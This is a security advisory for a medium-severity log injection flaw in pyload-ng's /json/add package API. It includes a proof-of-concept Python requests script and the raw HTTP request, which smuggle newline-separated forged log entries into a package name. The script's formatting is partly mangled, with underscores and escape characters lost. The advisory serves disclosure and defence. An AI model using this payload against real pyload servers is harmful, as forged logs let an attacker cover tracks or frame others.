PT-2025-32447 — Pyload-Ng

PT-2025-32447 · Pypi · Pyload-Ng

Published

2025-07-30

Updated

2025-07-30

CVSS v3.1

4.3

Medium

Vector

AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Summary

A log injection vulnerability was identified in pyload in API /json/add package. This vulnerability allows user with add packages permission to inject arbitrary messages into the logs gathered by pyload.

Details

pyload will generate a log entry when creating new package using API /json/add package. This entry will be in the form of Added package 'NAME OF PACKAGE' containing 'NUMBER OF LINKS' links. However, when supplied with the name of new package containing a newline, this newline is not properly escaped. Newlines are also the delimiter between log entries. This allows the attacker to inject new log entries into the log file.

PoC

Run pyload in the default configuration by running the following command

pyload

We can now sign in as the pyload user who at least have add packages permissions. In my example, I will use the admin account to demonstrate this vulnerability. Now as an admin user, view the logs at http://localhost:8000/logs

Any attacker who at least have add packages permissions can now make the following request by crafting a python code to inject arbitrary logs.

import requests

session = requests.session()

burp0 url = "http://localhost:8000/json/add package"
burp0 cookies = {"pyload session 8000": "SESSION-ID-HERE"}
burp0 headers = {"sec-ch-ua-platform": ""Windows"", "Accept-Language": "en-US,en;q=0.9", "sec-ch-ua": ""Not)A;Brand";v="8", "Chromium";v="138"", "sec-ch-ua-mobile": "?0", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36", "Accept": "*/*", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryqRJM6zIUcE7ttXDf", "Origin": "http://localhost:8000", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty", "Referer": "http://localhost:8000/collector", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive"}
burp0 data = "------WebKitFormBoundaryqRJM6zIUcE7ttXDfr
Content-Disposition: form-data; name="add name"r
r
Fake new package containing 1 linksr
[2025-07-23 04:32:19] PWNED        SeaWind GET PWNEDr
[2025-07-23 04:32:19] INFO        pyload Added package Normal packager
------WebKitFormBoundaryqRJM6zIUcE7ttXDfr
Content-Disposition: form-data; name="add links"r
r
123r
------WebKitFormBoundaryqRJM6zIUcE7ttXDfr
Content-Disposition: form-data; name="add password"r
r
123r
------WebKitFormBoundaryqRJM6zIUcE7ttXDfr
Content-Disposition: form-data; name="add file"; filename="tt"r
Content-Type: application/octet-streamr
r
r
------WebKitFormBoundaryqRJM6zIUcE7ttXDfr
Content-Disposition: form-data; name="add dest"r
r
0r
------WebKitFormBoundaryqRJM6zIUcE7ttXDf--r
"
session.post(burp0 url, headers=burp0 headers, cookies=burp0 cookies, data=burp0 data)

The Burpsuite HTTP Request for the above code

POST /json/add package HTTP/1.1
Host: localhost:8000
Content-Length: 799
sec-ch-ua-platform: "Windows"
Accept-Language: en-US,en;q=0.9
sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqRJM6zIUcE7ttXDf
Origin: http://localhost:8000
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8000/collector
Accept-Encoding: gzip, deflate, br
Cookie: pyload session 8000=SESSIONS-ID-HERE
Connection: keep-alive

------WebKitFormBoundaryqRJM6zIUcE7ttXDf
Content-Disposition: form-data; name="add name"

Fake new package containing 1 links
[2025-07-23 04:32:19] HACKER        SeaWind GET PWNED
[2025-07-23 04:32:19] INFO        pyload Added package Normal package
------WebKitFormBoundaryqRJM6zIUcE7ttXDf
Content-Disposition: form-data; name="add links"

123
------WebKitFormBoundaryqRJM6zIUcE7ttXDf
Content-Disposition: form-data; name="add password"

123
------WebKitFormBoundaryqRJM6zIUcE7ttXDf
Content-Disposition: form-data; name="add file"; filename="tt"
Content-Type: application/octet-stream


------WebKitFormBoundaryqRJM6zIUcE7ttXDf
Content-Disposition: form-data; name="add dest"

0
------WebKitFormBoundaryqRJM6zIUcE7ttXDf--

After executing the following python code and send the request successfully, if we now were to look at the logs again, we see that the entry has successfully been injected.

Impact

Forged or otherwise, corrupted log files can be used to cover an attacker’s tracks or even to implicate another party in the commission of a malicious act.

Fix

Code Injection

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-94

Related Identifiers

GHSA-3WWM-HJV7-23R3

Affected Products

Pyload-Ng